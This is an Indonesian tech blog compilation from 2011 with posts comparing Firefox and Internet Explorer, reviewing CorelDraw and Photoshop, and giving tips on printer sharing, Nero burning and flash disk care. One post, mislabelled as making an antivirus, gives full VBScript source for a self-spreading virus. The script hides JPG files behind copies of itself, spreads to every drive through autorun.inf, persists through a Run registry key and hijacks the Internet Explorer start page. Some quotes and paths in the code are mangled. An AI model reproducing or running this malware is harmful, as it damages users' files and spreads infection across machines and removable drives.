Selasa, 15 November 2011

perbedaan antara Inter Explorer Dan Mozila Firefox

A. Kelebihan Firefox Dibandingkan IE

1. Merupakan browser dengan perkembangan paling pesat dan jumlah pengguna yang terus meningkat

2. Security yang lebih handal

3. Ukuran download yang jauh lebih kecil.

4. Banyak tersedia addons untuk kelengkapan fungsi dari firefox

5. Ada komunitas pengembangnya di seluruh dunia (Betatester)

6. Kemungkinan konfigurasi yang sangat banyak, jauh dibandingkan IE

7. Javascript lebih didefault pada object DOM (jadi yang gag dikenal gag akan dikeluarin/ditampilin)

8. Pipeline lebih gede daripada IE

9. Integrasi dengan banyak aplikasi

10. Browser dengan pertimbangan grafis minimal untuk mode default tanpa plugin

11. Pengaturan lebih banyak (about:config)

12. Operasi Encrypsi lebih aman dengan adanya tambahan setification 64bit

13. Mozzila Engine dll

B. Kekurangan Firefox Dibandingkan IE

1. Startup time (waktu menjalankan program pertama kali) sangat lambat dan berat.

2. Tidak berfungsi optimal bila tidak ditambahi addons

3. Para crackers sekarang mulai membidik browser ini, karena jumlah penggunanya yang besar.

4. Program update berarti mendownload versi baru dari Firefox, berbeda dengan IE yang hanya mengupgrade modulnya saja

5. Banyak addons tidak berfungsi apabila Firefox telah diupdate. (berlaku untuk perubahan yang besar, misalnya dari versi 2 ke versi 3)

7. Waktu proses halaman situs tertentu lebih lambat, diperkirakan karena masalah kompatibilitas atau kesesuaian antara pengkodean halaman situs dengan browser Mozilla Firefox

8. Tidak terintegrasi dengan Outlook maupun Outlook Express, beberapa fasilitas e-mail tidak bekerja dengan baik, seperti melihat e-mail HTML maupun membuka link langsung dari e-mail di Outlook.

9. Tidak mendukung sinkronisasi dengan PocketPC Windows dan sinkronisasi USB-cradle, misalnya untuk men-download web calendar

10. Terdapat perbedaan penampilan halaman situs dengan IE, terlebih apabila halaman situs dirancang untuk menampilkan halaman tersebut dengan benar.

11. Instalasi plug-in tidak semudah pada IE, misalnya untuk menginstal Flash Player, Shockwave, Java Virtual Matchine diperlukan instalasi secara manual (tidak otomatis). Firefox juga tidak mendukung instalasi aplikasi Microsoft secara online, misalnya aktivasi Microsoft Reader

12. Beberapa formulir online tidak merespon penekanan tombol Enter sebagai jalan pintas untuk menekan tombol “submit” di layar.

Cara Mensharing Printer Dalam Suatu Jaringan

ilmukomputer-anton.blogspot.com, Dalam mensharing printer pada suatu jaringan ,yang harus anda lakukan adalah sebagai berikut :

  1. Pastikan terdapat suatu PC yang telah ada dan sudah terinstal printer.
  2. Kemudian sharinglah printer tersebut dari PC tadi dengan cara seperti biasanya.
  3. Bukalah hasil sharing printer tadi dari PC lain yang akan disharing dengan cara membuka start menu-setting-control panel- printer and faxes atau (printer and other hardware).
  4. klik Add Printer-Next-pilih ( a network printer or …..) kemudian next
  5. Pilih “Browse for a printer” lalu Next.
  6. Pilih /cari letak printer yang dipasang (misalnya di PC yang telah diberi nama “8″ pada saat pensharingan tadi) dengan mengkliknya dua kali, lalu akan muncul nama dari printer tadi misalnya”HP Laserjet 2010″ kemudian Next.
  7. Lalu akan muncul apakah printer yang disharing akan dijadikan default (Yes atau jika tidak pilih No).
  8. Finish (printer telah siap digunakan).

Kelemahan dan kekurangan Corel Draw

ilmukomputer-anton.blogspot.com, Corel Draw adalah editor grafik vektor yang dibuat oleh Corel, sebuah perusahaan perangkat lunak yang bermarkas di Ottawa, Kanada.CorelDraw merupakan salah satu aplikasi pengolah gambar berbasis vector yang banyak dipakai oleh pengguna PC. Karena berbagai kemudahan dan keunggulan yang dimiliki oleh coreldraw, maka coreldraw sering dimanfaatkan untuk desktop publishing, percetakan, dan bidang lain yang memerlukan pemrosesan visual.
Keunggulan dari Coreldraw:

1. Gambar berbasis vektor adalah ukuran hasil akhir yang dapat ditekan seminimal mungkin namun dengan kualitas yang tidak kalah dengan gambar berbasis raster atau bitmap. Karena itulah desain grafis dan olah gambar berbasis vektor sangat banyak digunakan untuk desktop publishing, percetakan, dan bidang lain yang memerlukan pemrosesan visual.

2. Selain karena tampilannya yang user friendly dan mudah dipelajari

3. Coreldraw sangat bagus dalam kolaborasi teks dan gambar. Meskipun photoshop juga bisa namun lebih mudah dengan coreldraw.

4. Dukungan forum dan komunitas coreldraw yang begitu banyak dan beragam, sehingga kita bisa dengan mudah menemukan tutorial, tips dan bisa berbagi ilmu dengan pengguna coreldraw lainnya di seluruh dunia.

5. exim (export-import) format grafis yang didukung sangat banyak sehingga membantu kompatibilitasnya.

6. Mempunyai banyak tools dan effect yang memudahkan pembuatanobjek vector (garis, lengkung, kotak) terutama dalam mendesain/redesign logo.

7. Untuk duplikasi objek banyak sekalilangkah yang bias digunakan misalnya dengan menekan tombol ‘+’ pada keypad, Ctrl+D, Copas, Effect Blend, mirror transform dll.

8. Font bawaan CorelDraw sangat banyak sehingga mencukupi dalam pembuatan logo dll.

Kekurangan dari coreldraw

1. Memakan memori dan resource lain yang sangat besar apalagi bila gambar yang sedang dibuat mempunyai detail yang banyak. Pada PC yang low end penggunaan CDR sering menimbulkan pesan ‘crash’ pada system bahkan dalam proses effect bevel/emboss dalam PC yang bagus pun dapattimbul ‘hang’.

2. Besar file yang dibuat membengkak

3. Warna yang dicetak tidak akurat (tidak sesuai dengan tampilan layar) pada beberapa jenis printer

4. Dalam pembuatan objek table tidak semudah membuat table dalam MS Word. Yaitu dengancara yang sangat manual

5. Apabila ada penggabungan objek vector dan photo/bitmap kualitas cetakannya kurang memuaskan, misalnya membuat cover buku yang terdapat objek text dan photo.

6. Kompatibilitas versi CorelDraw banyak kendala dalam sharing keversilainnya.

Manfaat, kelebihandan kekurangan dari Adobe Photoshop

ilmukomputer-anton.blogspot.com, Adobe Photoshop adalah software yang dibuat oleh perusahaan Adobe System, yang di khususkan untuk pengeditan foto atau gambar dan pembuatan effect. Perangkat lunak ini banyak digunakan oleh Fotografer Digital dan perusahaan iklan sehingga dianggap sebagai pemimpin pasar (market leader) untuk perangkat lunak pengolah gambar. Meskipun pada awalnya Photoshop dirancang untuk menyunting gambar untuk cetakan berbasis-kertas, Photoshop yang ada saat ini juga dapat digunakan untuk memproduksi gambar untuk World Wide Web. Beberapa versi terakhir juga menyertakan aplikasi tambahan, Adobe ImageReady, untuk keperluan tersebut.
Photoshop juga memiliki hubungan erat dengan beberapa perangkat lunak penyunting media, animasi, dan authoring buatan-Adobe lainnya. File format asli Photoshop, .PSD, dapat diekspor ke dan dari Adobe ImageReady. Adobe Illustrator, Adobe Premiere Pro, After Effects dan Adobe Encore DVD untuk membuat DVD profesional, menyediakan penyuntingan gambar non-linear dan layanan special effect seperti background, tekstur, dan lain-lain untuk keperluan televisi, film, dan situs web. Sebagai contoh, Photoshop CS dapat digunakan untuk membuat menu dan tombol (button) DVD.
Photoshop dapat menerima penggunaan beberapa model warna:

• RGB color model
• Lab color model
• CMYK color model
• Grayscale
• Bitmap
• Duotone

Kelebihan Adobe Photoshop

1. Membuat tulisan dengan effect tertentu.
Photoshop dapat mengubah bentuk tulisan menjadi lebih kreatif dan inovatif dengan tool effect yang ada didalamnya.
Photoshop memiliki kemampuan untuk membaca dan menulis gambar berformat raster dan vektor seperti .png, .gif, .jpeg, dan lain-lain. Photoshop juga memiliki beberapa format file khas:

• PSD (Photoshop Document) format yang menyimpan gambar dalam bentuk layer, termasuk teks, mask, opacity, blend mode, channel warna, channel alpha, clipping paths, dan setting duotone. Kepopuleran photoshop membuat format file ini digunakan secara luas, sehingga memaksa programer program penyunting gambar lainnya menambahkan kemampuan untuk membaca format PSD dalam perangkat lunak mereka.

• PSB' adalah versi terbaru dari PSD yang didesain untuk file yang berukuran lebih dari 2 Gb

• PDD adalah versi lain dari PSD yang hanya dapat mendukung fitur perangkat lunak PhotshopDeluxe.

2. Membuat tekstur dan material yang beragam.
Dengan langkah-langkah tertentu, seorang Desainer dapat membuat gambar misalnya daun, logam, air, dan bermacam gambar lainnya

3. Mengedit foto dan gambar yang sudah ada.
Ada desaingrafisvector and vexel.Adobe menyediakan filter "reduce grain" (mengurangi grain) yang dapat membantu mengoptimalkan foto yang diambil pada kondisi kekurangan cahaya
4. Memproses materi Web.
Photoshop juga digunakan untuk keperluan web, misalnya: kompresi file gambar agar ukurannya lebih kecil, memotong gambar kecil-kecil (slice), dan membuat web photo gallery. Dengan Adobe Image Ready, gambar yang sudah ada bisa dibuat untuk keperluan web, misalnya menjadi rollover dan animasi GIF.


Kelemahan Adobe Photoshop

Kelemahan Adobe Photoshop dalam menciptakan Image adalah bahwa Adobe Photoshop hanya bisa digunakan untuk menciptakan Image yang statis, dan juga dengan berkembangnya versi Photoshopsekarang ini spesifikasi Komputer untuk menjalankan program Adobe Photoshop juga harus sudah tinggi dan yang pasti akan diimbangi oleh harga yang tinggi pula.

Tutorial Cara Burning CD atau DVD dengan Nero


ilmukomputer-anton.blogspot.com,
Nero salah satu software yang banyak digunakan untuk membackup data file ke dalam cd atau DVD, selain mudah dan cepat memburning data dengan nero resiko kerusakan file hasil burning juga lebih kecil daripada kita langsung menggunakan burning cd melalui media windows pada explorer, berikut tutorial cara burning cd /dvd dengan nero




Pertama buka software nero, jika belum memilikinya silahkan download disini
setelah nero terbuka pilih menu Data > Make Data Cd/DVD pada kotak tampilan nero


Setelah selesai akan muncul disc content, kotak bantuan untuk memilih data atau file kita yang akan dimasukkan ke dalam cd/dvd, pilih file yang akan kita masukan dengan mengeklik tombol add, pada langkah ini perhatikan jumlah data yang akan kita masukkan jangan sampai melebihi batas maksimal penyimpanan cd / dvd yang kita gunakan. Setelah selesai klik next untuk melanjutkan proses


Pada Final Burn Setting kita dapat mengubah nama cd / dvd yang kita burning dan contreng fungsi multisession dics agar cd yang kita burning dapat kita tambahkan data pada lain waktu, setelah selesai klik Burn.


Tunggu proses burning selesai, jika sudah selesai cek cd yang kita burning, apakah isinya sesuai dengan yang masukkan. Jika isi sesuai dengan yang kita masukkan berarti burning cd kita sukses dan tidak bermasalah, selamat mencoba.

Tips Merawat Flashdisk

ilmukomputer-anton.blogspot.com

perawatan dasar usb flash disk :

  1. Jangan dijatuhkan atau dipukul-pukul dengan benda keras agar komponen di dalamnya tidak rusak.
  2. Hindari suhu panas termasuk terkena sinar matahari langsung serta suhu dingin yang terlalu dingin agar komponen tidak rusak.
  3. Jangan dicemplungkan ke dalam air kecuali yakin benar-benar anti air dengan garansi penuh.
  4. Hindari medan magnet tinggi seperti speaker, dinamo, dan lain-lain agar media penyimpanan tidak terganggu.
  5. Simpanlah flahs disk usb kita di tempat yang benar agar kita tidak lupa menaruhnya akibat ukuran flash disk yang kecil. Simpan di tempat yang bersih dan tertutup dengan baik agar komponen tidak kotor.
  6. Selalu buat copy data cadangan atau backup data di komputer atau laptop kita yang dilindungi anti virus atau media lain seperti cd dan dvd agar jika data hilang kita tidak panik dan stress.
  7. Setelah kita gunakan di komputer lain lakukan pemindaian atau scan dengan antivirus yang terbaru dan terupdate rutin agar aman dari virus yang ikutan mendompleng usb flash drive bisa diberantas.
  8. Jangan langsung mencabut usb flashdisk ketika selesai digunakan agar tidak rusak datanya. Gunakan metode eject atau stop untuk mematikannya terlebih dulu sebelum kita cabut.
  9. Normalnya usb flash disk dapat digunakan sebanyak ribuan atau jutaan kali diisi dan dihapus data. Setelah itu flashdisk akan lemah, mati atau rusak. Sebaiknya tidak bekerja atau mengedit pada file yang ada di flash disk. Kopi dulu ke hard disk drive lalu edit, dan setelah selesai kopi kembali file yang sudah diedit ke dalam flah disk.
  10. Pilih merek produk flashdisk yang garansi dan purna jual bagus kalau perlu ltw singkatan dari life time warranty. Simpan bon pembelian dengan baik untuk klaim penggantian baru atau perbaikan bila rusak.
  11. Jangan terlalu sering format flash disk karena dapat rusak dan mengurangi jumlah batasan hapus tulis. Jika melakukan manage flash disk pilihlah cluster terbesar agar kerja flashdisk tidak berat.
  12. Jika ada waktu defrag flash disk anda agar struktur data di dalam flash disk bisa diatur agar kinerja flashdisk kita lebih optimal.

Cara Menjaga Flashdisk Dari Virus

Selanjutnya saya menjelaskan bagaimana caranya agar flashdisk kita tidak terkena virus dengan cara menggunakan software, tampilannya bisa dilihat melalui gambar dibawah ini :

Software tersebut mengamankan data kita dari virus terutama virus yang sering menginfeksi autorun.

Flash Disk Lock adalah sebuah aplikasi untuk menyembunyikan data yg ada didalam Flash Disk dan sekaligus mengunci akses ke dalam Flash Disk. Untuk dapat akses ke Flash Disk diperlukan password. Flash Disk Lock ini berfungsi juga untuk menghindari virus yang memanfaatkan fungsi autorun dan juga sebagai pencegahan dini terhadap virus karena disediakan fungsi Scan untuk File Asing atau Virus yang bersembunyi didalam Root Direktori Flash Disk. Extensi File yang dideteksi adalah EXE, VBS, SCR, INF, INI, HTT, BAT, COM, PIF.

System Operasi Yang Diperlukan supaya aplikasi Flash Disk Lock ini bisa berjalan dengan baik adalah Windows 2000 atau windows XP. Untuk System Flash Disk Lock diperlukan +/- 500 Kb Free Space di Flash Disk. Flash Disk Lock ini hanya untuk digunakandi USB Flash Disk.TIDAK KOMPATIBEL untuk USB MP3 Player.

Itulah kegunaan aplikasi Flash Disk Lock ini, yaitu untuk pencegahan dini terhadap Virus. Namun demikian saya tidak menjamin 100% aman…karena perkembangan virus terus berubah dan semakin mencari kelemahan korbannya.

Jangan lupa untuk mengunci Flash Disk jika akan mencabutnya dari komputer, karena untuk pencegahan jika akan menancapkan kembali ke komputer, Flash dalam keadaan terkunci sehingga data anda aman dari virus yang menginfeksi Flash Disk saat di tancapkan dikomputer. Dan Jangan lupa untuk klik tombol Scan untuk mendeteksi virus yang bersarang di Flash Disk. Jika tidak terdapat virus atau File asing, baru data anda aman untuk dibuka.

Kamis, 10 November 2011

Cara membuat antivirus Menggunakan Visual Basic

ilmukomputer-anton.blogspot.com, Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario virus tersebut adalah sebagai berikut:
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer

Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub

2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub

3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan
Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub

4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub

5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub

6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
On Error Resume Next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<>”c:\windows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()

Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “KONYOL”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat.(RM)

Tips untuk Mendeteksi Penyebab Masalah Komputer Anda


ilmukompiuter-anton.blogspot.com, Hal ini penting bagi Anda untuk mengetahui masalah yang sebenarnya dari komputer yang Anda gunakan untuk mempertahankan kinerja dan tidak harus berurusan dengan masalah di masa depan. Ini adalah tips dasar bagi Anda untuk mendeteksi penyebab masalah komputer Anda: Laptop / Komputer bekerja lambat Ada beberapa faktor yang menyebabkan pekerjaan laptop lambat, seperti:

1. Kapasitas Hardisc: Lihat kapasitas digunakan hardisc, jika kapasitas telah digunakan 90% maka laptop mungkin kurang cepat kinerjanya. Kemudian cadangan arsip Anda jarang digunakan untuk media lain, misalnya DVD. Alternatif lain adalah menambahkan kapasitas hardisc, pastikan jika ruang hardisc lebih dari 20%. Untuk memiliki hardisc yang optimal melakukan proses defragment secara teratur.

2. Virus: Virus adalah salah satu penyebab lambat loading pada komputer Anda, maka mengapa bisa efek virus komputer untuk beban perlahan-lahan? Virus interupts logaritma dari suatu aplikasi yang terinfeksi, juga menghasilkan layanan mengganggu. Jika Anda mendapatkan terinfeksi virus, gunakan progam Anti Virus kemudian scan hardisc Anda untuk memiliki kinerja yang lebih baik untuk komputer Anda.

3. Instalasi terlalu banyak aplikasi: setiap aplikasi diinstal dapat menambahkan beban baru ke komputer Anda, pilih aplikasi yang Anda butuhkan lebih banyak. Jika aplikasi uninstall yang diperlukan yang Anda tidak perlu atau Anda dapat menonaktifkan program pelayanan

4. Overheating komputer / laptop Komputer overheating / laptop karena penggunaan periode panjang dan perangkat kerja terlalu keras, atau sistem pendingin tidak bekerja dengan benar, tanda sistem pendingin yang tidak tepat adalah suara berisik kipas angin. Mereka adalah masalah umum dari laptop, komputer atau sistem komputasi-gadget, yang Anda dapat mengatasi sendiri tanpa bantuan profesional, kecuali yang kompleks.

5. (Input / Output) – Masalah dalam Input / Output: Hal ini sering bahwa komputer berbasis kegiatan kita tidak jauh dari kegiatan lain, untuk contoh makan, saat bekerja dengan komputer dan makan, sempalan / serpih dan kotoran dari makanan Anda akan menempel dan jika Anda melakukannya terlalu sering, akan masuk ke Anda keyboard dan mouse. Anda dapat menggunakan kuas untuk membersihkan keyboard dan menggunakan jaringan alkohol untuk menyeka mouse, melakukannya secara teratur seperti sebulan sekali. Jika sebuah port VGA, printer, kartu LAN bekerja dengan benar, Anda harus membersihkannya terlebih dahulu sebelum mengklaim untuk kerusakan toko / toko. Kasus umum dari port output yang tidak benar debu di port output akan masuk ke port komputer dan akan memblokir proses mentransfer data.(ZA)

instalasi kabel LAN